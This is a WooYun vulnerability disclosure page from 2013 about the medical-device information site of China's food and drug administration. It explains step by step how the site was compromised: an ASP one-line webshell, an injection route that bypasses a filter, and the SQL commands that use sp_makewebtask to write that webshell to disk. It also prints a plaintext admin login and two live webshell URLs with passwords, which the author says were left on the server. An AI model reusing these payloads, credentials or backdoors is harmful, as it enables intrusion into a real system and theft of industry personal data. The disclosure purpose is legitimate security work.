当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032589

漏洞标题:国家食品药品监督管理局下属某网站注入点拿shell(行业信息受到安全威胁)

相关厂商:国家食品药品监督管理局

漏洞作者: nauscript

提交时间:2013-07-30 17:50

修复时间:2013-09-13 17:51

公开时间:2013-09-13 17:51

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

一个通过MYSQL建表拿webshell和另类绕过防注入的案例

详细说明:

国家食品药品监督管理局信息中心主办的-----中国医疗器械信息网(CMDI)
网站:http://www.cmdi.gov.cn

0.jpg


#---#一句话引出的线索
通过Google hack搜索到了这样一个asp文件
http://www.cmdi.gov.cn:5555/tz/test.asp

1.jpg


似乎并没有什么特别,但是他的底下的

%3c%25execute request(%22@%22)%25%3e

刺激到了我敏感的神经,不错,是一句话!不过是unicode格式的,转换过来应该是

<%execute request("@")%>

密码是@,显然这是通过sql命令在数据库建表插入一句话后的成果,看了一下这个asp文件的源码,其中tittle显示“Microsoft SQL Server Web 助手”也更加印证了我的猜测

1.1.jpg


看来这个站已经有人光临了。
#---#另类绕过防注入
那么既然是通过数据库建表,那么一定注入没错,信心满满的把http://www.cmdi.gov.cn用工具跑了一圈,居然没有可利用的注入点,蒙了。
但是我马上想到了刚才那个文件是出自http://www.cmdi.gov.cn:5555,先访问之,居然目录遍历了,还有一个“sql防注入工具”的文件夹

4.jpg


怪不得呢,那就拿http://www.cmdi.gov.cn:5555跑一圈,此时这个防注入工具似乎不起作用了,果然找到了我想要的,轻松射入,拿下数据库
#---#MYSQL建表拿webshell
有三个数据库,果不其然,在cmdi_db数据库中发现了test表,其中正是我们在前面看到的一句话

5.jpg


那他是如何做到传大马的呢?根据上面我们已经获得的这些信息可以很轻松的还原当时的渗透过程
1、首先在其得到数据库后通过sql命令先新建一个test表,字段pc,字段类型为字符型长度为255
命令如下:

create table test(pc char(255))


2、然后为字段赋值一句话,密码为@

insert into test(pc) values ('<%execute request("@")%>')


3、由于要在链接地址提交,因此要将一句话转换成unicode格式,也就是我们最开始看到的%3c%25execute request(%22@%22)%25%3e
sql命令变为:

insert into test(pc) values ('%3c%25execute request(%22@%22)%25%3e')


4、然后将test表导出为asp文件,也就是我们刚开始搜索到的那个test.asp文件
命令:

execute sp_makewebtask @outputfile='E:\Lotus\Domino\data\sbl\CMDI\tz\test.asp',@query='select pc from test'


在这里,路径就是你导出asp一句话文件的地方,而之前幸运的在那个可以遍历的目录里找到了几个显错的asp文件显示了路径
不过从之前发现这个test.asp文件的目录里一些上传的asp文件和日期可以看出,这位黑客并不是一次成功的
用得到的大马一看,服务器很好拿,权限高、端口开的多

3_副本.jpg


.jpg


找到一个管理入口http://www.cmdi.gov.cn:5555/work/EXPOCHECK.ASP
用户名和密码(sbl ylqx831 方便验证,请修改)居然没问显示着,就跟个后门似的

2.jpg


里面存在着大量的企业、以及行业从业人员的信息,影响全国整个医疗器械行业!

6.jpg


当然,服务器上还仍有许多资料信息,入侵将会给该行业信息安全带来威胁,并且在渗透过程中发现先前进入的这位黑客有篡改网站文件等行为,这种行为是白帽子所不耻的,强烈谴责这种行为,也希望网站管理方国家食品药品监督管理局信息中心能及时修复漏洞。
看在我花一早上时间写完突然断电又重写的份上,加个精?本来写的比这个详细,丢了就没心思继续了。。。。

漏洞证明:

留下两个webshell方便乌云审核人员审核,向你们致敬!
http://www.cmdi.gov.cn:5555/systemsqldb.asp mumaasp.com
同时支持aspx文件
http://www.cmdi.gov.cn:5555/test.aspx admin

修复方案:

服务器设置

版权声明:转载请注明来源 nauscript@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-08-03 17:21

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-21 14:59 | covertops ( 普通白帽子 | Rank:112 漏洞数:23 | wooyun)

    学习了